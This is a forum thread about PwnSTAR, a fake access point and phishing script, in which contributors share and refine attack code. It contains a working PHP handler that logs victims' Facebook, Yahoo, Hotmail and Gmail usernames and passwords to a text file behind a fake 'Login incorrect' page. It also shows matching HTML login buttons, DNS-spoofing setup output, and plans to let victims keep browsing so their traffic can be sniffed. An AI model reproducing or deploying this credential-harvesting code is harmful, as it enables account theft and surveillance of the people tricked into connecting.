Re: Soft AP / Phishing Script [Release]
VulpArgenti, thank you for your work on this script, it works very well.
I have made some changes to the html and php portions of this script and wanted to share them here.
I wanted to know which service the victim/user was trying to log in with so I modified lines 37 through 40 of index.html to include name="service" on the login buttons:
Code:
<td align=center ><input type="submit" value="login" name="facebook" /></td>
<td align=center ><input type="submit" value="login" name="yahoo" /></td>
<td align=center ><input type="submit" value="login" name="hotmail" /></td>
<td align=center ><input type="submit" value="login" name="gmail" /></td>
I've made several modifications to process-form-data.php so I'll post the entire file here. I added the handling of the names of the buttons, I changed the layout of the .txt file it creates, I made it display an error and refresh back to the login page so they don't keep refreshing and adding the credentials to the file over and over, and shortened the sleep(4) to sleep(1) because 4 seemed to be too long to me (just preference maybe).
Here's the new process-form-data.php
Code:
<?php
$name = $_POST['login'];
$password = $_POST['password'];
if($_POST['facebook']){
$service = "facebook";
}elseif($_POST['yahoo']){
$service = "yahoo";
}elseif($_POST['hotmail']){
$service = "hotmail";
}elseif($_POST['gmail']){
$service = "gmail";
}
$accinfo = "login: $name\npass: $password\nservice: $service\n-----\n";
$fp = fopen("formdata.txt", "a");
fwrite($fp, $accinfo);
fclose($fp);
sleep(1);
$error =
"<html>\n" .
"<head>\n" .
"<meta http-equiv=\"Refresh\" content=\"5;url=/\" />\n" .
"</head>\n" .
"<body>\n" .
"<center><p1><b>Login incorrect.</b></p1></center>\n" .
"<center><p1>You are being redirected.</p1></center>\n" .
"</body>\n" .
"</html>";
echo $error;
//uncomment to debug $_POST variable:
//print_r($_POST);
//uncomment to list name, password, and service variables:
//echo('$name: ' . $name . '<br>$password: ' . $password . '<br>$service: ' . $service);
?>
Re: Soft AP / Phishing Script [Release]
Quote:
#resize -s 38 85 &> /dev/null # resize the terminal
commented out because it really f*cks up the resize
I've now tested this and it looks as though this is a KDE problem (I see the colours are not great either). I'm not really interested in exploring KDE so for the moment KDE users should comment out this line, and I'll either fix it or remove it from the next release.
Re: Soft AP / Phishing Script [Release]
Had to remove the resizing and colouring; it messed up on KDE.
Otherwise looks good, get a few errors like no such thing as dhcp3.
The login page simply lets you login once you press "Login" even if you don't enter credentials, pretty annoying.
Re: Soft AP / Phishing Script [Release]
@devi1,
Great contribution - nice to see the open-source community in action.
Two questions:
1. Can you amend the php to allow the victim to continue on to browse, once they have entered credentials? Something like:
Code:
if [no credentials entered], then error function (same as you have now)
else [credentials entered], echo "Thank you. Refresh browser to continue browsing"
I can look at coding iptables to support this, and have PwnSTAR sniff their activities.
2. Can I put your php up on the googlecode page (with full accreditation of course)?
Regards
Vulpi
Re: Soft AP / Phishing Script [Release]
@Vulpi,
1. I was thinking of this and was not too sure how to go about doing that; if I can figure it out I'd definitely implement this. Someone else with more experience may get to it first.
2. If you like what I've done then feel free to include it in the project.
Re: Soft AP / Phishing Script [Release]
I found this page with information on setting up a captive portal with iptables and php: http://www.andybev.com/index.php/Usi...captive_portal
It looks like it would be fairly simple to add this to your script. This may also require adding some kind of setup script that creates the rmtrack file and modifies the sudoers file to allow apache to modify iptables.
Re: Soft AP / Phishing Script [Release]
It seems php is similar to bash: this does the job;
PHP Code:
if(($password == "") || ($name == "")){
echo $error;
}else{ echo $success;
}
---------------------------------------------------------------
Quote:
captive portal... fairly simple to add this to your script
We'll see how simple!!:rolleyes:
Reference: Re: Soft AP / Phishing Script [Release]
Hello VulpiArgenti, thank you for your advice, but that's exactly how I am configuring everything. Anyway, I suppose my problem resides in the DHCP... the victim connects to the fake AP but there is no transmission of data at all (checking the victim PC I have only transmitted packets victim->fake, and 0 received). I tried purging and reinstalling the whole dhcp3 via apt (no result), and then trying on a fresh bt5r2 gnome 64, and nothing yet. I am using an alfa awus036nh as fake AP, so I don't think the problem could be the receiver (you have the same one if I recall correctly :P). Could I provide more information? Just tell me, right now I'm very curious to discover the real problem! Thanks!
Quote:
Originally Posted by VulpiArgenti
Hi bugme,
Thanks for your comments - much appreciated.
Regarding the Eterm colours, you can see on the screenshot that they should be a very readable purple/yellow. Please launch Eterm then adjust the background settings: transparency off, pixmap none; then "save theme settings". This gives a blank background to show the script colours.
You shouldn't need to create any additional directories once you have moved "hotspot" into /var/www. Your directory setup should look like this:
Code:
root@bt:~# ls /var/www
hotspot index.html wstool
root@bt:~# ls /var/www/hotspot
facebookLogo.jpg GmailLogo.png HotmailLogo.png process-form-data.php
formdata.txt GoogleWifi.jpg index.html yahoo.gif
And then running the script (red is your entries):
Code:
Setting up the web page
MUST have directory structure set up correctly
Available web directories:
hotspot
index.html
wstool
Select directory
hotspot
hotspot/index moved into position
Starting Apache...
* Starting web server apache2 [ OK ]
...success
Starting DNS spoofing...
Do you want to tail the credentials txtfile? (y/n)
y
facebookLogo.jpg GmailLogo.png HotmailLogo.png process-form-data.php
formdata.txt GoogleWifi.jpg index.html yahoo.gif
Enter name of txtfile
formdata.txt
Web Server attack running
Try again with it set up like this.
If there are still problems we need to troubleshoot your victim's connection. Does a lease show up in the "DHCP Tail" eterm, and does the DNSSpoof eterm show activity?
Re: Reference: Re: Soft AP / Phishing Script [Release]
Quote:
Does a lease show up in the "DHCP Tail" eterm, and does the DNSSpoof eterm show activity?
Hi bugme, would you copy and post the contents of these 2 eterms, after your victim has associated?
Re: Soft AP / Phishing Script [Release]
[Update]
Version 0.51 out:
- Improved navigation and trapping (thanks snafu777 for the motivation)
- Recognises KDE, doesn't attempt resize
- Changed background to black (better in KDE)
- Made input technique more obvious (thanks nivong)
- Improved error handling
- Various minor bugfixes
- Added option of stopping dnsspoof to allow internet access once credentials are harvested. Note this must be done manually.
- Improved hotspot php (with assistance from devi1). Can no longer bypass the login page.
Please READ THE SCRIPT, it contains a lot of comments (and should help you understand the mechanics of these simple attacks, as well as learn basic bash coding).
I also forgot to mention in my initial post that the comments section of the script contains acknowledgement of other scripts I looked at (and I recommend you do the same).
Meet the new improved PwnSTAR at: http://code.google.com/p/pwn-star/downloads/list
[Coming next - a functional captive portal page with multi-client handling (Hopefully. Maybe)]